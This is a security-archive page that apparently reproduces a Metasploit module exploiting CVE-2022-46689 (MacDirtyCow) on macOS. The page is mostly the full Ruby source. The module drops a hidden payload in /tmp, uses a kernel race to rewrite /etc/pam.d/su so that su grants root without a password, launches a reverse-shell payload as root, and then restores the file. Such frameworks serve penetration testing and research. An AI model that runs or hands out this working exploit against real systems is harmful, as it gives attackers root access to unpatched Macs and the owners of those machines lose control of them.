macOS Dirty Cow Arbitrary File Write Local Privilege Escalation

macOS Dirty Cow Arbitrary File Write Local Privilege Escalation: Posted Feb 3, 2023; Authored by timwr, Ian Beer, Zhuowei Zhang | Site metasploit.com; Dirty Cow arbitrary file write local privilege escalation exploit for macOS.; tags | exploit, arbitrary, local; advisories | CVE-2022-46689; SHA-256 | 2c735a5dbdfd48004da2df38d8a8eed0528ab5199ff9cd6dbf70e890c7786c0c; Download | Favorite | View

macOS Dirty Cow Arbitrary File Write Local Privilege Escalation

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Post::File
  include Msf::Post::OSX::Priv
  include Msf::Post::OSX::System
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'macOS Dirty Cow Arbitrary File Write Local Privilege Escalation',
        'Description' => %q{
          An app may be able to execute arbitrary code with kernel privileges
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Ian Beer', # discovery
          'Zhuowei Zhang', # proof of concept
          'timwr' # metasploit integration
        ],
        'References' => [
          ['CVE', '2022-46689'],
          ['URL', 'https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.61.2/tests/vm/vm_unaligned_copy_switch_race.c'],
          ['URL', 'https://github.com/zhuowei/MacDirtyCowDemo'],
        ],
        'Platform' => 'osx',
        'Arch' => ARCH_X64,
        'SessionTypes' => ['shell', 'meterpreter'],
        'DefaultTarget' => 0,
        'DefaultOptions' => { 'PAYLOAD' => 'osx/x64/shell_reverse_tcp' },
        'Targets' => [
          [ 'Mac OS X x64 (Native Payload)', {} ],
        ],
        'DisclosureDate' => '2022-12-17',
        'Notes' => {
          'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES],
          'Reliability' => [REPEATABLE_SESSION],
          'Stability' => [CRASH_SAFE]
        }
      )
    )
    register_advanced_options [
      OptString.new('TargetFile', [ true, 'The pam.d file to overwrite', '/etc/pam.d/su' ]),
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
    ]
  end

  def check
    version = Rex::Version.new(get_system_version)
    if version > Rex::Version.new('13.0.1')
      CheckCode::Safe
    elsif version < Rex::Version.new('13.0') && version > Rex::Version.new('12.6.1')
      CheckCode::Safe
    elsif version < Rex::Version.new('10.15')
      CheckCode::Safe
    else
      CheckCode::Appears
    end
  end

  def exploit
    if is_root?
      fail_with Failure::BadConfig, 'Session already has root privileges'
    end

    unless writable? datastore['WritableDir']
      fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"
    end

    payload_file = "#{datastore['WritableDir']}/.#{rand_text_alphanumeric(5..10)}"
    binary_payload = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
    upload_and_chmodx payload_file, binary_payload
    register_file_for_cleanup payload_file

    target_file = datastore['TargetFile']
    current_content = read_file(target_file)
    backup_file = "#{datastore['WritableDir']}/.#{rand_text_alphanumeric(5..10)}"
    unless write_file(backup_file, current_content)
      fail_with Failure::BadConfig, "#{backup_file} is not writable"
    end
    register_file_for_cleanup backup_file

    replace_content = current_content.sub('rootok', 'permit')

    replace_file = "#{datastore['WritableDir']}/.#{rand_text_alphanumeric(5..10)}"
    unless write_file(replace_file, replace_content)
      fail_with Failure::BadConfig, "#{replace_file} is not writable"
    end
    register_file_for_cleanup replace_file

    exploit_file = "#{datastore['WritableDir']}/.#{rand_text_alphanumeric(5..10)}"
    exploit_exe = exploit_data 'CVE-2022-46689', 'exploit'
    upload_and_chmodx exploit_file, exploit_exe
    register_file_for_cleanup exploit_file

    exploit_cmd = "#{exploit_file} #{target_file} #{replace_file}"
    print_status("Executing exploit '#{exploit_cmd}'")
    result = cmd_exec(exploit_cmd)
    print_status("Exploit result:\n#{result}")

    su_cmd = "echo '#{payload_file} & disown' | su"
    print_status("Running cmd:\n#{su_cmd}")
    result = cmd_exec(su_cmd)
    unless result.blank?
      print_status("Command output:\n#{result}")
    end

    exploit_cmd = "#{exploit_file} #{target_file} #{backup_file}"
    print_status("Executing exploit (restoring) '#{exploit_cmd}'")
    result = cmd_exec(exploit_cmd)
    print_status("Exploit result:\n#{result}")
  end

end

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 64 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

macOS Dirty Cow Arbitrary File Write Local Privilege Escalation

macOS Dirty Cow Arbitrary File Write Local Privilege Escalation

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

macOS Dirty Cow Arbitrary File Write Local Privilege Escalation

Share This

macOS Dirty Cow Arbitrary File Write Local Privilege Escalation

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems